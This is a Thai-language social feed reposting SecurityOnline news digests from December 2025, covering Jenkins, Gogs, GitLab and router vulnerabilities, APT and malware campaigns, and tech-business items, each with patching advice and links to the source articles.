https://securityonline.info/slack-ceo-denise-dresser-joins-openai-as-cro-to-solve-the-profitability-puzzle 🛠️ Jenkins เจอช่องโหว่ร้ายแรง เสี่ยงถูกโจมตี DoS และ XSS ทีมพัฒนา Jenkins ออกประกาศเตือนครั้งใหญ่ หลังพบช่องโหว่หลายรายการที่อาจทำให้ระบบ CI/CD ถูกโจมตีจนหยุดทำงาน หรือโดนฝังสคริปต์อันตราย (XSS) โดยเฉพาะช่องโหว่ CVE-2025-67635 ที่เปิดโอกาสให้แฮกเกอร์ส่งคำสั่งผ่าน HTTP CLI โดยไม่ต้องล็อกอิน ทำให้เซิร์ฟเวอร์ทรัพยากรถูกใช้จนล่ม อีกช่องโหว่ CVE-2025-67641 ใน Coverage Plugin ก็เปิดทางให้ผู้โจมตีฝังโค้ด JavaScript ลงในรายงาน เมื่อผู้ดูแลเปิดดู รายงานนั้นจะรันสคริปต์ทันที เสี่ยงต่อการถูกขโมย session และข้อมูลสำคัญ แม้จะมีการอัปเดตแก้ไขหลายจุด เช่น การเข้ารหัส token และการปิดช่องโหว่การเห็นรหัสผ่าน แต่ยังมีบางปลั๊กอินที่ยังไม่มีแพตช์ออกมา ทำให้ผู้ดูแลระบบต้องรีบอัปเดต Jenkins และปลั๊กอินที่เกี่ยวข้องเพื่อป้องกันความเสียหาย 🔗 https://securityonline.info/high-severity-jenkins-flaws-risk-unauthenticated-dos-via-http-cli-and-xss-via-coverage-reports 🐙 Gogs Zero-Day โดนเจาะกว่า 700 เซิร์ฟเวอร์ ผ่าน Symlink Path Traversal นักวิจัยจาก Wiz พบช่องโหว่ใหม่ใน Gogs (CVE-2025-8110) ที่เปิดทางให้ผู้โจมตีสามารถเขียนไฟล์อันตรายลงในระบบได้ง่าย ๆ ผ่านการใช้ symlink โดยช่องโหว่นี้เป็นการเลี่ยงแพตช์เก่าที่เคยแก้ไขไปแล้ว ทำให้กว่า 700 เซิร์ฟเวอร์จาก 1,400 ที่ตรวจสอบถูกเจาะสำเร็จ การโจมตีมีลักษณะเป็นแคมเปญ “smash-and-grab” คือเข้ามาเร็ว ใช้ symlink เขียนทับไฟล์สำคัญ เช่น .git/config แล้วรันคำสั่งอันตราย จากนั้นติดตั้ง payload ที่ใช้ Supershell เพื่อควบคุมเครื่องจากระยะไกล ปัจจุบันยังไม่มีแพตช์ออกมา ผู้ดูแลระบบจึงถูกแนะนำให้ปิดการสมัครสมาชิกสาธารณะ และจำกัดการเข้าถึงระบบทันที 🔗 https://securityonline.info/gogs-zero-day-cve-2025-8110-risks-rce-for-700-servers-via-symlink-path-traversal-bypass 🧩 GitLab พบช่องโหว่ XSS เสี่ยงโดนขโมย session ผ่าน Wiki GitLab ออกอัปเดตด่วนเพื่อแก้ไขช่องโหว่ CVE-2025-12716 ที่มีความรุนแรงสูง (CVSS 8.7) โดยช่องโหว่นี้เกิดขึ้นในฟีเจอร์ Wiki ที่ผู้ใช้สามารถสร้างเพจได้ หากมีการฝังโค้ดอันตรายลงไป เมื่อผู้ใช้รายอื่นเปิดดู เพจนั้นจะรันคำสั่งแทนผู้ใช้โดยอัตโนมัติ เสี่ยงต่อการถูกยึด session และสั่งงานแทนเจ้าของบัญชี นอกจากนี้ยังมีช่องโหว่อื่น ๆ เช่น การ inject HTML ในรายงานช่องโหว่ และการเปิดเผยข้อมูลโครงการที่ควรเป็น private ผ่าน error message และ GraphQL query GitLab.com และ GitLab Dedicated ได้รับการแก้ไขแล้ว แต่ผู้ที่ใช้ self-managed instance ต้องรีบอัปเดตเวอร์ชัน 18.6.2, 18.5.4 หรือ 18.4.6 เพื่อปิดช่องโหว่เหล่านี้ 🔗 https://securityonline.info/high-severity-gitlab-xss-flaw-cve-2025-12716-risks-session-hijack-via-malicious-wiki-pages 📱 Facebook ปรับโฉมใหม่ แต่ Instagram ใช้ AI ดึง SEO มีรายงานว่า Facebook ได้ปรับโฉมหน้าตาใหม่ แต่สิ่งที่น่าสนใจคือ Instagram ถูกเปิดโปงว่าใช้ AI เพื่อสร้างคอนเทนต์ที่ดึง SEO ให้ติดอันดับการค้นหา คล้ายกับการทำ content farm โดยไม่ได้บอกผู้ใช้ตรง ๆ เรื่องนี้จึงถูกตั้งคำถามถึงความโปร่งใสและจริยธรรมของ Meta ที่อาจใช้ AI เพื่อผลักดันการเข้าถึงโดยไม่เปิดเผยต่อสาธารณะ 🔗 https://securityonline.info/facebook-gets-new-look-but-instagram-secretly-uses-ai-for-seo-bait 🚀 SpaceX เตรียม IPO มูลค่าเป้าหมายทะลุ 1.5 ล้านล้านดอลลาร์ SpaceX กำลังเดินหน้าแผน IPO ครั้งใหญ่ที่สุดในประวัติศาสตร์ โดยตั้งเป้าระดมทุนกว่า 30 พันล้านดอลลาร์ ซึ่งจะทำลายสถิติของ Saudi Aramco ที่เคยทำไว้ในปี 2019 ที่ 29 พันล้านดอลลาร์ สิ่งที่ทำให้ตลาดตะลึงคือการตั้งเป้ามูลค่าบริษัทไว้สูงถึง 1.5 ล้านล้านดอลลาร์ แม้รายได้ของ SpaceX ในปี 2025 จะอยู่ที่ประมาณ 15.5 พันล้านดอลลาร์ ซึ่งน้อยกว่า Tesla ถึง 6 เท่า แต่ความคาดหวังอยู่ที่อนาคตของ Starlink และ Starship รวมถึงแผนสร้างศูนย์ข้อมูลในอวกาศเพื่อรองรับ AI และการสื่อสารผ่านดาวเทียม Musk เชื่อว่าการรวมพลังของ Starlink และ Starship จะขยายตลาดได้มหาศาล และนี่อาจเป็นก้าวสำคัญที่สุดของ SpaceX 🔗 https://securityonline.info/spacex-ipo-targeting-a-1-5-trillion-valuation-to-fund-space-data-centers 🐼 จีนเปิดปฏิบัติการไซเบอร์ WARP PANDA ใช้ BRICKSTORM เจาะ VMware และ Azure มีการเปิดโปงแคมเปญจารกรรมไซเบอร์ครั้งใหญ่ที่ดำเนินการโดยกลุ่มแฮกเกอร์จากจีนชื่อ WARP PANDA พวกเขาไม่ได้โจมตีแบบธรรมดา แต่เลือกเจาะเข้าไปในโครงสร้างพื้นฐาน IT ที่สำคัญอย่าง VMware vCenter และ ESXi รวมถึงระบบคลาวด์ Microsoft Azure จุดเด่นคือการใช้เครื่องมือที่สร้างขึ้นเองชื่อ BRICKSTORM ซึ่งเป็น backdoor ที่แฝงตัวเหมือนโปรเซสของระบบ ทำให้ยากต่อการตรวจจับ นอกจากนี้ยังมีเครื่องมือเสริมอย่าง Junction และ GuestConduit ที่ช่วยควบคุมการสื่อสารในระบบเสมือนจริงได้อย่างแนบเนียน สิ่งที่น่ากังวลคือพวกเขาสามารถอยู่ในระบบได้นานเป็นปีโดยไม่ถูกพบ และยังขยายการโจมตีไปสู่บริการ Microsoft 365 เพื่อขโมยข้อมูลสำคัญ การกระทำเหล่านี้สะท้อนให้เห็นถึงแรงจูงใจเชิงรัฐมากกว่าการเงิน เพราะเป้าหมายคือข้อมูลที่เกี่ยวข้องกับผลประโยชน์ของรัฐบาลจีน 🔗 https://securityonline.info/chinas-warp-panda-apt-deploys-brickstorm-backdoor-to-hijack-vmware-vcenter-esxi-and-azure-cloud 📡 ช่องโหว่ร้ายแรง TOTOLINK AX1800 เปิดทางให้แฮกเกอร์เข้าถึง root โดยไม่ต้องล็อกอิน มีการค้นพบช่องโหว่ในเราเตอร์ TOTOLINK AX1800 ที่ใช้กันแพร่หลายในบ้านและธุรกิจขนาดเล็ก ช่องโหว่นี้ทำให้ผู้โจมตีสามารถส่งคำสั่ง HTTP เพียงครั้งเดียวเพื่อเปิดบริการ Telnet โดยไม่ต้องผ่านการยืนยันตัวตน เมื่อ Telnet ถูกเปิดแล้ว แฮกเกอร์สามารถเข้าถึงสิทธิ์ระดับ root และควบคุมอุปกรณ์ได้เต็มรูปแบบ ผลกระทบคือสามารถดักจับข้อมูล เปลี่ยนเส้นทาง DNS หรือใช้เป็นฐานโจมตีอุปกรณ์อื่นในเครือข่ายได้ ที่น่ากังวลคือยังไม่มีแพตช์แก้ไขจากผู้ผลิต ทำให้ผู้ใช้ต้องป้องกันตัวเองด้วยการปิดการเข้าถึงจาก WAN และตรวจสอบการเปิดใช้งาน Telnet อย่างเข้มงวด 🔗 https://securityonline.info/unpatched-totolink-ax1800-router-flaw-allows-unauthenticated-telnet-root-rce ⚠️ FBI และ CISA เตือนกลุ่มแฮกเกอร์สายโปรรัสเซียโจมตีโครงสร้างพื้นฐานผ่าน VNC ที่ไม่ปลอดภัย หน่วยงานด้านความมั่นคงไซเบอร์ของสหรัฐฯ รวมถึง FBI และ CISA ออกคำเตือนว่ากลุ่มแฮกเกอร์ที่สนับสนุนรัสเซียกำลังโจมตีโครงสร้างพื้นฐานสำคัญ เช่น ระบบน้ำ พลังงาน และอาหาร โดยใช้วิธีง่าย ๆ คือค้นหา Human-Machine Interfaces (HMI) ที่เชื่อมต่อผ่าน VNC แต่ไม่ได้ตั้งรหัสผ่านที่แข็งแรง เมื่อเข้าถึงได้ พวกเขาจะปรับเปลี่ยนค่าการทำงาน เช่น ความเร็วปั๊ม หรือปิดระบบแจ้งเตือน ทำให้ผู้ควบคุมไม่เห็นภาพจริงของโรงงาน กลุ่มที่ถูกระบุมีทั้ง Cyber Army of Russia Reborn, NoName057(16), Z-Pentest และ Sector16 ซึ่งมีความเชื่อมโยงกับรัฐรัสเซีย แม้จะไม่ซับซ้อน แต่การโจมตีแบบนี้สร้างความเสียหายได้จริงและยากต่อการคาดเดา 🔗 https://securityonline.info/fbi-cisa-warn-pro-russia-hacktivists-target-critical-infrastructure-via-unsecured-vnc-hmis 🎥 ช่องโหว่ร้ายแรงใน CCTV (CVE-2025-13607) เสี่ยงถูกแฮกดูภาพสดและขโมยรหัสผ่าน CISA ออกประกาศเตือนเกี่ยวกับช่องโหว่ในกล้องวงจรปิดที่เชื่อมต่อเครือข่าย โดยเฉพาะรุ่น D-Link DCS-F5614-L1 ที่เปิดช่องให้ผู้โจมตีเข้าถึงการตั้งค่าและข้อมูลบัญชีได้โดยไม่ต้องยืนยันตัวตน ผลคือสามารถดูภาพสดจากกล้องและขโมยรหัสผ่านผู้ดูแลเพื่อเจาะลึกเข้าไปในระบบต่อไปได้ ช่องโหว่นี้มีคะแนนความรุนแรงสูงถึง 9.4 และแม้ D-Link จะออกเฟิร์มแวร์แก้ไขแล้ว แต่ผู้ใช้แบรนด์อื่นอย่าง Securus และ Sparsh ยังไม่ได้รับการตอบสนอง ทำให้ผู้ใช้ต้องรีบตรวจสอบและติดต่อผู้ผลิตเองเพื่อความปลอดภัย 🔗 https://securityonline.info/critical-cctv-flaw-cve-2025-13607-risks-video-feed-hijack-credential-theft-via-missing-authentication 🛡️ ข่าวด่วน: Google ออกแพตช์ฉุกเฉินแก้ช่องโหว่ Zero-Day บน Chrome เรื่องนี้เป็นการอัปเดตที่สำคัญมากของ Google Chrome เพราะมีการค้นพบช่องโหว่ร้ายแรงที่ถูกโจมตีจริงแล้วในโลกออนไลน์ Google จึงรีบปล่อยเวอร์ชันใหม่ 143.0.7499.109/.110 เพื่ออุดช่องโหว่ โดยช่องโหว่นี้ถูกระบุว่าเป็น “Under coordination” ซึ่งหมายถึงยังอยู่ระหว่างการทำงานร่วมกับผู้พัฒนาซอฟต์แวร์อื่น ๆ ทำให้รายละเอียดเชิงเทคนิคยังไม่ถูกเปิดเผย แต่ที่แน่ ๆ คือมีผู้ไม่หวังดีนำไปใช้โจมตีแล้ว นอกจากนี้ยังมีการแก้ไขช่องโหว่ระดับกลางอีกสองรายการ ได้แก่ปัญหาใน Password Manager และ Toolbar ที่นักวิจัยภายนอกรายงานเข้ามา พร้อมได้รับรางวัลบั๊กบาวน์ตี้รวม 4,000 ดอลลาร์ เรื่องนี้จึงเป็นการเตือนผู้ใช้ทุกคนให้รีบตรวจสอบและอัปเดต Chrome ด้วยตนเองทันที ไม่ควรรอการอัปเดตอัตโนมัติ เพราะความเสี่ยงกำลังเกิดขึ้นจริงแล้ว 🔗 https://securityonline.info/emergency-chrome-update-google-patches-new-zero-day-under-active-attack 🤖 นวัตกรรมใหม่: สถาปัตยกรรม AI ของ Google แรงกว่า GPT-4 ในด้านความจำ Google เปิดตัวสถาปัตยกรรมใหม่ชื่อ Titans และกรอบแนวคิด MIRAS ที่ออกแบบมาเพื่อแก้ปัญหาการจำข้อมูลระยะยาวของโมเดล AI แบบเดิม ๆ จุดเด่นคือสามารถ “อ่านไป จำไป” ได้เหมือนสมองมนุษย์ โดยใช้โมดูลความจำระยะยาวที่ทำงานคล้ายการแยกความจำสั้นและยาวในสมองจริง ๆ สิ่งที่น่าสนใจที่สุดคือ “surprise metric” กลไกที่เลือกจำเฉพาะข้อมูลที่แปลกใหม่หรือไม่คาดคิด เช่นเดียวกับที่มนุษย์มักจำเหตุการณ์ที่ไม่ธรรมดาได้ชัดเจน ผลลัพธ์คือโมเดลนี้สามารถจัดการข้อมูลยาวมหาศาลได้ถึงสองล้านโทเคน และยังทำงานได้ดีกว่า GPT-4 แม้จะมีพารามิเตอร์น้อยกว่า นอกจากนี้ MIRAS ยังเปิดทางให้สร้างโมเดลใหม่ ๆ ที่มีความสามารถเฉพาะด้าน เช่นการทนต่อสัญญาณรบกวนหรือการรักษาความจำระยะยาวอย่างมั่นคง การทดสอบกับชุดข้อมูล BABILong แสดงให้เห็นว่า Titans มีศักยภาพเหนือกว่าโมเดลชั้นนำอื่น ๆ ในการดึงข้อมูลที่กระจายอยู่ในเอกสารขนาดใหญ่ ทำให้อนาคตของ AI ในการทำความเข้าใจทั้งเอกสารหรือแม้แต่ข้อมูลทางพันธุกรรมดูสดใสและทรงพลังมากขึ้น 🔗 https://securityonline.info/the-surprise-metric-googles-new-ai-architecture-outperforms-gpt-4-in-memory
    0 Comments 0 Shares 881 Views 0 Reviews
  • หัวข้อข่าว: “GitLab พบช่องโหว่ XSS ร้ายแรง เสี่ยงถูกยึดบัญชีผ่าน Wiki Pages”

    ช่องโหว่ร้ายแรง CVE-2025-12716 ถูกค้นพบใน GitLab Wiki Pages โดยเป็นช่องโหว่แบบ Cross-Site Scripting (XSS) ที่เปิดทางให้ผู้โจมตีสามารถฝังโค้ดอันตรายลงในหน้า Wiki และใช้เพื่อ ขโมย Session Token ของผู้ใช้ ทำให้เสี่ยงต่อการถูกยึดบัญชีและเข้าถึงข้อมูลโครงการที่สำคัญ

    ลักษณะของช่องโหว่
    ช่องโหว่นี้เกิดจากการที่ระบบ Wiki ของ GitLab ไม่ได้กรองโค้ดอันตรายอย่างเหมาะสม ทำให้ผู้โจมตีสามารถฝัง JavaScript Payload ลงในหน้า Wiki ได้ เมื่อผู้ใช้เปิดหน้า Wiki ที่ถูกฝังโค้ด จะทำให้ Session Token ของผู้ใช้ถูกส่งไปยังผู้โจมตีทันที

    ความเสี่ยงและการโจมตี
    หากผู้โจมตีได้ Session Token พวกเขาสามารถ เข้าสู่ระบบในฐานะผู้ใช้เป้าหมาย โดยไม่ต้องใช้รหัสผ่าน และเข้าถึงข้อมูลโครงการ, Repository, Pipeline รวมถึงการตั้งค่าที่สำคัญได้ การโจมตีลักษณะนี้เสี่ยงต่อการรั่วไหลของข้อมูลและการแก้ไขโค้ดโดยไม่ได้รับอนุญาต

    ผลกระทบในวงกว้าง
    GitLab ถูกใช้อย่างแพร่หลายทั้งในองค์กร, บริษัทซอฟต์แวร์ และโครงการโอเพ่นซอร์สทั่วโลก ช่องโหว่นี้จึงมีผลกระทบในวงกว้าง โดยเฉพาะองค์กรที่ใช้ GitLab ในการจัดการโค้ดและ CI/CD หากไม่อัปเดตแพตช์ อาจเสี่ยงต่อการสูญเสียข้อมูลสำคัญ

    การแก้ไขและคำแนะนำ
    GitLab ได้ออกแพตช์แก้ไขในเวอร์ชันล่าสุดแล้ว ผู้ใช้ควรอัปเดตทันที พร้อมทั้งตรวจสอบ Wiki Pages ที่มีการแก้ไขล่าสุด หากพบโค้ดที่ไม่ปกติควรลบออก และตั้งค่า Content Security Policy (CSP) เพื่อเพิ่มการป้องกัน

    สรุปเป็นหัวข้อ
    รายละเอียดช่องโหว่ CVE-2025-12716
    เป็นช่องโหว่ XSS ใน GitLab Wiki Pages
    เปิดทางให้ฝัง JavaScript Payload อันตราย

    ความเสี่ยงจากการโจมตี
    ผู้โจมตีสามารถขโมย Session Token ของผู้ใช้
    เข้าสู่ระบบในฐานะผู้ใช้เป้าหมายโดยไม่ต้องใช้รหัสผ่าน
    เข้าถึง Repository และ Pipeline ได้

    ผลกระทบในวงกว้าง
    GitLab ถูกใช้อย่างแพร่หลายทั้งองค์กรและโครงการโอเพ่นซอร์ส
    เสี่ยงต่อการรั่วไหลและแก้ไขโค้ดโดยไม่ได้รับอนุญาต

    การแก้ไขและคำแนะนำ
    อัปเดต GitLab เป็นเวอร์ชันล่าสุดทันที
    ตรวจสอบ Wiki Pages ที่ถูกแก้ไขล่าสุด
    ตั้งค่า Content Security Policy (CSP) เพื่อเพิ่มการป้องกัน

    คำเตือนสำหรับผู้ใช้และองค์กร
    หากไม่อัปเดตแพตช์ ผู้ใช้เสี่ยงถูกยึดบัญชี
    การละเลยการตรวจสอบ Wiki Pages อาจเปิดช่องให้โค้ดอันตรายทำงาน
    การไม่ตั้งค่า CSP ทำให้ระบบเสี่ยงต่อการโจมตี XSS ซ้ำ

    https://securityonline.info/high-severity-gitlab-xss-flaw-cve-2025-12716-risks-session-hijack-via-malicious-wiki-pages/
    🛠️ หัวข้อข่าว: “GitLab พบช่องโหว่ XSS ร้ายแรง เสี่ยงถูกยึดบัญชีผ่าน Wiki Pages” ช่องโหว่ร้ายแรง CVE-2025-12716 ถูกค้นพบใน GitLab Wiki Pages โดยเป็นช่องโหว่แบบ Cross-Site Scripting (XSS) ที่เปิดทางให้ผู้โจมตีสามารถฝังโค้ดอันตรายลงในหน้า Wiki และใช้เพื่อ ขโมย Session Token ของผู้ใช้ ทำให้เสี่ยงต่อการถูกยึดบัญชีและเข้าถึงข้อมูลโครงการที่สำคัญ 🔓 ลักษณะของช่องโหว่ ช่องโหว่นี้เกิดจากการที่ระบบ Wiki ของ GitLab ไม่ได้กรองโค้ดอันตรายอย่างเหมาะสม ทำให้ผู้โจมตีสามารถฝัง JavaScript Payload ลงในหน้า Wiki ได้ เมื่อผู้ใช้เปิดหน้า Wiki ที่ถูกฝังโค้ด จะทำให้ Session Token ของผู้ใช้ถูกส่งไปยังผู้โจมตีทันที 🕵️ ความเสี่ยงและการโจมตี หากผู้โจมตีได้ Session Token พวกเขาสามารถ เข้าสู่ระบบในฐานะผู้ใช้เป้าหมาย โดยไม่ต้องใช้รหัสผ่าน และเข้าถึงข้อมูลโครงการ, Repository, Pipeline รวมถึงการตั้งค่าที่สำคัญได้ การโจมตีลักษณะนี้เสี่ยงต่อการรั่วไหลของข้อมูลและการแก้ไขโค้ดโดยไม่ได้รับอนุญาต 🌍 ผลกระทบในวงกว้าง GitLab ถูกใช้อย่างแพร่หลายทั้งในองค์กร, บริษัทซอฟต์แวร์ และโครงการโอเพ่นซอร์สทั่วโลก ช่องโหว่นี้จึงมีผลกระทบในวงกว้าง โดยเฉพาะองค์กรที่ใช้ GitLab ในการจัดการโค้ดและ CI/CD หากไม่อัปเดตแพตช์ อาจเสี่ยงต่อการสูญเสียข้อมูลสำคัญ 🛡️ การแก้ไขและคำแนะนำ GitLab ได้ออกแพตช์แก้ไขในเวอร์ชันล่าสุดแล้ว ผู้ใช้ควรอัปเดตทันที พร้อมทั้งตรวจสอบ Wiki Pages ที่มีการแก้ไขล่าสุด หากพบโค้ดที่ไม่ปกติควรลบออก และตั้งค่า Content Security Policy (CSP) เพื่อเพิ่มการป้องกัน 📌 สรุปเป็นหัวข้อ ✅ รายละเอียดช่องโหว่ CVE-2025-12716 ➡️ เป็นช่องโหว่ XSS ใน GitLab Wiki Pages ➡️ เปิดทางให้ฝัง JavaScript Payload อันตราย ✅ ความเสี่ยงจากการโจมตี ➡️ ผู้โจมตีสามารถขโมย Session Token ของผู้ใช้ ➡️ เข้าสู่ระบบในฐานะผู้ใช้เป้าหมายโดยไม่ต้องใช้รหัสผ่าน ➡️ เข้าถึง Repository และ Pipeline ได้ ✅ ผลกระทบในวงกว้าง ➡️ GitLab ถูกใช้อย่างแพร่หลายทั้งองค์กรและโครงการโอเพ่นซอร์ส ➡️ เสี่ยงต่อการรั่วไหลและแก้ไขโค้ดโดยไม่ได้รับอนุญาต ✅ การแก้ไขและคำแนะนำ ➡️ อัปเดต GitLab เป็นเวอร์ชันล่าสุดทันที ➡️ ตรวจสอบ Wiki Pages ที่ถูกแก้ไขล่าสุด ➡️ ตั้งค่า Content Security Policy (CSP) เพื่อเพิ่มการป้องกัน ‼️ คำเตือนสำหรับผู้ใช้และองค์กร ⛔ หากไม่อัปเดตแพตช์ ผู้ใช้เสี่ยงถูกยึดบัญชี ⛔ การละเลยการตรวจสอบ Wiki Pages อาจเปิดช่องให้โค้ดอันตรายทำงาน ⛔ การไม่ตั้งค่า CSP ทำให้ระบบเสี่ยงต่อการโจมตี XSS ซ้ำ https://securityonline.info/high-severity-gitlab-xss-flaw-cve-2025-12716-risks-session-hijack-via-malicious-wiki-pages/
    SECURITYONLINE.INFO
    High-Severity GitLab XSS Flaw (CVE-2025-12716) Risks Session Hijack via Malicious Wiki Pages
    A High-severity XSS (CVSS 8.7) flaw in GitLab Wiki allows session hijack via malicious pages, enabling unauthorized actions. Other HTML Injection flaws patched. Self-managed admins must update to v18.6.2.
    0 Comments 0 Shares 143 Views 0 Reviews
  • 🩷 รวมข่าวจากเวบ SecurityOnline 🩷

    #รวมข่าวIT #20251209 #securityonline


    ช่องโหว่ Bluetooth เสี่ยงทำรถอัจฉริยะและ Wear OS ค้าง
    เรื่องนี้เป็นการเปิดเผยช่องโหว่ใหม่ในระบบ Bluetooth ที่อาจทำให้เกิดการโจมตีแบบ Denial of Service (DoS) ส่งผลให้รถยนต์อัจฉริยะและอุปกรณ์ Wear OS เกิดการค้างหรือหยุดทำงานได้ ช่องโหว่นี้ถูกติดตามในรหัส CVE-2025-48593 และมีการเผยแพร่ PoC (Proof of Concept) แล้ว ซึ่งหมายความว่ามีตัวอย่างการโจมตีที่สามารถนำไปใช้จริงได้ แม้รายงานฉบับเต็มจะเปิดให้เฉพาะผู้สนับสนุน แต่สิ่งที่ชัดเจนคือความเสี่ยงที่ผู้ใช้รถยนต์และอุปกรณ์สวมใส่อัจฉริยะต้องเผชิญ หากไม่ได้รับการอัปเดตแก้ไขอย่างทันท่วงที
    https://securityonline.info/poc-available-bluetooth-flaw-risks-dos-crash-on-smart-cars-and-wear-os

    ช่องโหว่ร้ายแรงใน Duc Disk Tool เสี่ยงข้อมูลรั่วและระบบล่ม
    มีการค้นพบช่องโหว่ร้ายแรงในเครื่องมือ Duc ซึ่งเป็นซอฟต์แวร์โอเพ่นซอร์สที่ใช้สำหรับตรวจสอบและแสดงผลการใช้งานดิสก์บนระบบ Linux ช่องโหว่นี้คือ CVE-2025-13654 เกิดจาก integer underflow ในฟังก์ชัน buffer_get ที่ทำให้เกิด buffer overflow ได้ หากผู้โจมตีส่งข้อมูลที่ถูกสร้างขึ้นมาอย่างเจาะจง จะสามารถทำให้โปรแกรมล่ม (DoS) หรือดึงข้อมูลจากหน่วยความจำที่ไม่ควรถูกเข้าถึงได้ ปัญหานี้กระทบต่อทุกเวอร์ชันก่อน 1.4.6 และทีมพัฒนาได้ออกแพตช์แก้ไขแล้ว ผู้ใช้ควรรีบอัปเดตเพื่อป้องกันการโจมตี
    https://securityonline.info/high-severity-duc-disk-tool-flaw-cve-2025-13654-risks-dos-and-information-leak-via-integer-underflow

    มัลแวร์ SeedSnatcher บน Android ล่าขโมย Seed Phrase ของผู้ใช้คริปโต
    มัลแวร์ใหม่ชื่อว่า “SeedSnatcher” กำลังแพร่ระบาดในกลุ่มผู้ใช้คริปโต โดยมันปลอมตัวเป็นแอปกระเป๋าเงินชื่อ “Coin” และถูกเผยแพร่ผ่าน Telegram และโซเชียลต่าง ๆ เมื่อผู้ใช้ติดตั้ง มัลแวร์จะสร้างหน้าจอหลอกเลียนแบบกระเป๋าเงินยอดนิยม เช่น MetaMask หรือ Trust Wallet เพื่อหลอกให้ผู้ใช้กรอก seed phrase จากนั้นมันจะตรวจสอบคำที่กรอกด้วย wordlist ของ BIP 39 เพื่อให้แน่ใจว่าถูกต้อง ก่อนส่งข้อมูลไปยังผู้โจมตี นอกจากนี้ยังสามารถดักจับ SMS, ข้อมูลติดต่อ, บันทึกการโทร และสั่งการเครื่องจากระยะไกลได้ หลักฐานบ่งชี้ว่ากลุ่มผู้โจมตีมีการจัดการแบบมืออาชีพและมีต้นทางจากจีนหรือผู้พูดภาษาจีน
    https://securityonline.info/seedsnatcher-android-malware-targets-crypto-users-using-overlay-phishing-and-bip-39-validation-to-steal-seed-phrases

    Meta ปรับปรุงระบบช่วยเหลือด้วย AI Assistant และ Recovery Hub ใหม่
    Meta ยอมรับว่าระบบช่วยเหลือผู้ใช้ Facebook และ Instagram ที่ผ่านมา “ล้มเหลว” จนผู้ใช้จำนวนมากต้องหาทางแก้ไขด้วยตัวเองหรือแม้กระทั่งฟ้องร้อง ล่าสุดบริษัทประกาศเปิดตัว Support Hub ใหม่ที่รวมทุกเครื่องมือช่วยเหลือไว้ในที่เดียว พร้อมเพิ่มฟีเจอร์ AI Chat ให้ผู้ใช้สอบถามปัญหาได้ทันที อีกทั้งยังมี AI Assistant ที่ช่วยในกระบวนการกู้คืนบัญชี เช่น การตรวจจับอุปกรณ์ที่ใช้บ่อย และการยืนยันตัวตนด้วยวิดีโอเซลฟี่ Meta ระบุว่าการปรับปรุงนี้ทำให้อัตราการกู้คืนบัญชีที่ถูกแฮ็กในสหรัฐฯ และแคนาดาเพิ่มขึ้นกว่า 30% อย่างไรก็ตาม หากผู้ใช้ไม่สามารถเข้าสู่ระบบได้เลย การเข้าถึง Support Hub ก็ยังเป็นปัญหาอยู่ และการติดต่อเจ้าหน้าที่จริงยังคงต้องพึ่งบริการแบบเสียเงิน
    https://securityonline.info/meta-fixes-broken-support-rolling-out-ai-assistants-and-new-recovery-hubs

    EU ปรับ X €120 ล้าน ฐานละเมิด DSA ด้วยการตรวจสอบ Blue Check ที่หลอกลวง
    สหภาพยุโรปได้สั่งปรับแพลตฟอร์ม X (เดิม Twitter) เป็นเงิน 120 ล้านยูโร เนื่องจากละเมิดกฎหมาย Digital Services Act (DSA) โดยเฉพาะการตรวจสอบบัญชีด้วย Blue Check ที่ถูกมองว่า “หลอกลวง” ระบบดังกล่าวทำให้ผู้ใช้เข้าใจผิดว่าบัญชีที่จ่ายเงินเพื่อรับเครื่องหมายนี้เป็นบัญชีที่ได้รับการตรวจสอบจริง ทั้งที่ไม่ได้มีการตรวจสอบตัวตนอย่างเข้มงวด EU จึงมองว่าเป็นการให้ข้อมูลที่ไม่โปร่งใสและเป็นการละเมิดกฎหมาย การปรับครั้งนี้สะท้อนถึงความเข้มงวดของ EU ในการบังคับใช้ DSA และอาจเป็นสัญญาณเตือนให้แพลตฟอร์มอื่น ๆ ต้องระมัดระวังมากขึ้น
    https://securityonline.info/eu-fines-x-e120-million-for-dsa-violation-over-deceptive-blue-check-verification

    CastleRAT มัลแวร์ใหม่ใช้ Steam เป็นช่องทางซ่อนตัว
    มีการค้นพบมัลแวร์ตัวใหม่ชื่อ CastleRAT ที่ถูกออกแบบมาให้แอบแฝงเข้าไปในระบบองค์กรเพื่อขโมยข้อมูลและควบคุมเครื่องจากระยะไกล จุดที่น่ากังวลคือเวอร์ชันที่ถูกเขียนด้วยภาษา C ซึ่งมีความสามารถซ่อนตัวได้แนบเนียนกว่าเวอร์ชัน Python และยังทำได้หลายอย่าง เช่น ดักจับการพิมพ์, แอบถ่ายหน้าจอ, ขโมยข้อมูลจาก clipboard รวมถึงการควบคุมเบราว์เซอร์โดยไม่ให้ผู้ใช้รู้ตัว ที่สำคัญ CastleRAT ยังใช้หน้า Community ของ Steam เป็นที่ซ่อนคำสั่ง ทำให้การสื่อสารกับเซิร์ฟเวอร์ควบคุมดูเหมือนการใช้งานปกติ ปัจจุบันนักวิจัยได้ออกแนวทางตรวจจับเพื่อช่วยให้องค์กรสามารถป้องกันภัยนี้ได้
    https://securityonline.info/sophisticated-castlerat-backdoor-uses-steam-community-pages-as-covert-c2-resolver-for-espionage

    LockBit 5.0 กลับมาอีกครั้งพร้อมความร้ายแรงกว่าเดิม
    หลังจากที่ปฏิบัติการ Cronos เคยทำให้กลุ่ม LockBit ถูกปราบไปเมื่อปี 2024 หลายคนคิดว่าภัยนี้จบแล้ว แต่ล่าสุด LockBit ได้กลับมาในเวอร์ชันใหม่ชื่อ LockBit 5.0 ที่อันตรายยิ่งกว่าเดิม จุดเด่นคือสามารถทำงานได้หลายแพลตฟอร์ม ทั้ง Windows, Linux และ VMware ESXi พร้อมโหมดล่องหนที่เข้ารหัสไฟล์โดยไม่ทิ้งร่องรอย และโหมดลบข้อมูลถาวรที่ทำให้การกู้คืนแทบเป็นไปไม่ได้ ที่น่ากลัวคือมันยังปิดการทำงานของระบบ Event Tracing ของ Windows ทำให้เครื่องมือรักษาความปลอดภัยมองไม่เห็นการโจมตี การกลับมาครั้งนี้แสดงให้เห็นว่ากลุ่มอาชญากรไซเบอร์ยังคงพัฒนาไม่หยุดและองค์กรต้องเตรียมรับมืออย่างจริงจัง
    https://securityonline.info/lockbit-5-0-resurfaces-stronger-new-variant-blinds-defenders-by-disabling-windows-etw-for-stealth-encryption

    Windows 11 เพิ่มตัวเลือกปิดเมนู AI ใน File Explorer
